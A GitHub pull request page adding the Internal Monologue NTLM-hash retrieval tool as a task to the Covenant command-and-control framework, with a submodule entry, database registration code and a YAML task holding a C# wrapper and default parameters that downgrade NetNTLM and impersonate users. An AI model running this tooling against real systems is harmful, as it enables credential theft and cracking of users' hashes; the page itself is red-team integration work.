Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Internal Monologue task #250

Open
wants to merge 6 commits into
base: master
Choose a base branch
from
+151 −4
Open

Add Internal Monologue task #250

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
6 commits
Select commit Hold shift + click to select a range
4808970
Add InternalMonologue submodule
salu90 Sep 22, 2020
3d9dcfc
Add InternalMonologue task and reference libraries
salu90 Sep 22, 2020
7ce1efa
Minor fixes
salu90 Sep 28, 2020
f3273c6
Update InternalMonologue.yaml
salu90 Sep 28, 2020
b7ed60a
Update DbInitializer.cs
salu90 Sep 28, 2020
e386214
Update InternalMonologue.yaml
salu90 Sep 29, 2020
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
3 changes: 3 additions & 0 deletions .gitmodules
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -30,3 +30,6 @@
path = Covenant/Data/ReferenceSourceLibraries/SharpSC
url = https://github.com/djhohnstein/SharpSC
ignore = dirty
[submodule "Covenant/Data/ReferenceSourceLibraries/InternalMonologue"]
path = Covenant/Data/ReferenceSourceLibraries/InternalMonologue
url = https://github.com/eladshamir/Internal-Monologue
30 changes: 26 additions & 4 deletions Covenant/Core/DbInitializer.cs
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -259,7 +259,13 @@ public async static Task InitializeTasks(ICovenantService service, CovenantConte
Name = "SharpSC", Description = "SharpSC is a .NET assembly to perform basic operations with services.",
Location= "SharpSC" + Path.DirectorySeparatorChar,
CompatibleDotNetVersions = new List<Common.DotNetVersion> { Common.DotNetVersion.Net35, Common.DotNetVersion.Net40 }
}
},
new ReferenceSourceLibrary
{
Name = "InternalMonologue", Description = "Internal Monologue is a tool to retrieve NTLM hashes without touching LSASS.",
Location= "InternalMonologue" + Path.DirectorySeparatorChar,
CompatibleDotNetVersions = new List<Common.DotNetVersion> { Common.DotNetVersion.Net35, Common.DotNetVersion.Net40 }
}
};
await service.CreateReferenceSourceLibraries(ReferenceSourceLibraries);

Expand All @@ -272,6 +278,7 @@ public async static Task InitializeTasks(ICovenantService service, CovenantConte
var su = await service.GetReferenceSourceLibraryByName("SharpUp");
var sw = await service.GetReferenceSourceLibraryByName("SharpWMI");
var sc = await service.GetReferenceSourceLibraryByName("SharpSC");
var im = await service.GetReferenceSourceLibraryByName("InternalMonologue");
await service.CreateEntities(
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = ss, ReferenceAssembly = await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = ss, ReferenceAssembly = await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net40) },
Expand Down Expand Up @@ -391,8 +398,23 @@ await service.CreateEntities(
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = sc, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = sc, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = sc, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.ServiceProcess.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = sc, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.ServiceProcess.dll", Common.DotNetVersion.Net40) }
);
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = sc, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.ServiceProcess.dll", Common.DotNetVersion.Net40) },

new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.XML.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.XML.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Security.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Security.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Data.DataSetExtensions.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Data.DataSetExtensions.dll", Common.DotNetVersion.Net40) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Data.dll", Common.DotNetVersion.Net35) },
new ReferenceSourceLibraryReferenceAssembly { ReferenceSourceLibrary = im, ReferenceAssembly = await service.GetReferenceAssemblyByName("System.Data.dll", Common.DotNetVersion.Net40) }
);
}
#endregion

Expand Down Expand Up @@ -506,4 +528,4 @@ public async static Task InitializeThemes(CovenantContext context)
}
}
}
}
}
1 change: 1 addition & 0 deletions Covenant/Data/ReferenceSourceLibraries/InternalMonologue
Open in desktop
Submodule InternalMonologue added at 469461
121 changes: 121 additions & 0 deletions Covenant/Data/Tasks/InternalMonologue.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,121 @@
- Name: InternalMonologue
Aliases: []
Author:
Name: 'Simone Salucci, Daniel López & Sergio Lázaro'
Handle: '@saim1z, @attl4s, @Slazar0'
Link: ''
Description: Internal Monologue downgrades NetNTLM and invokes a local procedure call to the NTLM authentication package (MSV1_0) with a specific challenge. The responses obtained can be cracked using rainbow tables.
Help:
Language: CSharp
CompatibleDotNetVersions:
- Net35
- Net40
Code: |
using System;
using System.IO;
using InternalMonologue;
using InternalMonologue.StringExtensions;

public static class Task
{
public static Stream OutputStream { get; set; }
public static string Execute(string Parameters)
{
string output = "";
try
{
TextWriter realStdOut = Console.Out;
TextWriter realStdErr = Console.Error;
TextWriter stdOutWriter = new StreamWriter(OutputStream);
TextWriter stdErrWriter = new StreamWriter(OutputStream);
Console.SetOut(stdOutWriter);
Console.SetError(stdErrWriter);

String[] args = Parameters.Split(' ');

try
{
Program.Main(args);
}
catch (Exception e)
{
Console.WriteLine("\r\n[!] Unhandled InternalMonlogue exception:\r\n");
Console.WriteLine(e);
}

Console.Out.Flush();
Console.Error.Flush();
Console.SetOut(realStdOut);
Console.SetError(realStdErr);
OutputStream.Close();
}
catch (Exception e) { output += e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; }
return output;
}
}
TaskingType: Assembly
UnsafeCompile: false
TokenTask: false
Options:
- Name: Parameters
Value: ''
DefaultValue: -Downgrade True -Restore True -Impersonate True -Thread False -Verbose False -Challenge 1122334455667788
Description: The command-line parameters to pass to the tool.
SuggestedValues: []
Optional: true
DisplayInCommand: true
FileOption: false
ReferenceSourceLibraries:
- Name: InternalMonologue
Description: Internal Monologue is a tool to retrieve NTLM hashes without touching LSASS.
Location: InternalMonologue\
Language: CSharp
CompatibleDotNetVersions:
- Net35
- Net40
ReferenceAssemblies:
- Name: System.Core.dll
Location: net40\System.Core.dll
DotNetVersion: Net40
- Name: System.Data.DataSetExtensions.dll
Location: net40\System.Data.DataSetExtensions.dll
DotNetVersion: Net40
- Name: System.Data.dll
Location: net40\System.Data.dll
DotNetVersion: Net40
- Name: System.dll
Location: net40\System.dll
DotNetVersion: Net40
- Name: System.Security.dll
Location: net40\System.Security.dll
DotNetVersion: Net40
- Name: mscorlib.dll
Location: net40\mscorlib.dll
DotNetVersion: Net40
- Name: System.XML.dll
Location: net35\System.XML.dll
DotNetVersion: Net35
- Name: System.dll
Location: net35\System.dll
DotNetVersion: Net35
- Name: System.Data.dll
Location: net35\System.Data.dll
DotNetVersion: Net35
- Name: System.Data.DataSetExtensions.dll
Location: net35\System.Data.DataSetExtensions.dll
DotNetVersion: Net35
- Name: System.Core.dll
Location: net35\System.Core.dll
DotNetVersion: Net35
- Name: mscorlib.dll
Location: net35\mscorlib.dll
DotNetVersion: Net35
- Name: System.Security.dll
Location: net35\System.Security.dll
DotNetVersion: Net35
- Name: System.XML.dll
Location: net40\System.XML.dll
DotNetVersion: Net40
EmbeddedResources: []
ReferenceAssemblies: []
EmbeddedResources: []